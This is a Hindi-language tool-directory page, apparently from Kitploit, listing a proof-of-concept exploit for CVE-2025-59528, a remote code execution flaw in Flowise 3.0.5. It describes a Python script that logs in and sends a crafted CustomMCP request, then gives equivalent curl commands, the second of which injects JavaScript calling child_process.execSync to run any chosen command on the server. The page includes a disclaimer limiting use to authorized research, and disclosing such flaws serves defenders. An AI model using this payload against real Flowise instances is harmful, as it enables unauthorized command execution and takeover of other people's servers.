Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 Proof of Concept | Kitploit
उपकरण/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 Proof of Concept

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59528 PoC

Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट Flowise CustomMCP RCE पथ को POST /api/v1/node-load-method/customMCP के माध्यम से ट्रिगर करने के लिए।

⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस टूल को उन सिस्टम्स के विरुद्ध चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।

श्रेय

  • im-soohyun (Kim SooHyun)

विवरण

  • CVE-2025-59528 के लिए PoC
  • प्रभावित संस्करण: Flowise 3.0.5
  • पैच किया गया संस्करण: Flowise 3.0.6
  • संदर्भ: https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

फ़ाइलें

  • poc.py: मशीन URL/IP, बेयर होस्ट/IP उपयोग होने पर वैकल्पिक प्रोटोकॉल, ईमेल, पासवर्ड, और कमांड मांगता है; लॉग इन करता है, कुकीज़ का पुन: उपयोग करता है, फिर एक तैयार किया गया CustomMCP अनुरोध भेजता है और HTTP स्थिति, हेडर, और प्रतिक्रिया निकाय को curl -i के समान प्रिंट करता है।

उपयोग

चलाएँ:

root@kitploit:~
python3 poc.py

फिर प्रदान करें:

  • मशीन URL/IP, जैसे 10.10.11.10, http://10.10.11.10, या https://target.example
  • यदि बेयर होस्ट/IP के लिए संकेत दिया जाए तो प्रोटोकॉल
  • ईमेल पता
  • लक्ष्य Flowise इंस्टेंस पर खाते का पासवर्ड
  • सर्वर पर निष्पादित करने के लिए कमांड

समतुल्य curl

पहला अनुरोध

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

दूसरा अनुरोध

root@kitploit:~
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
टूल डाउनलोड करें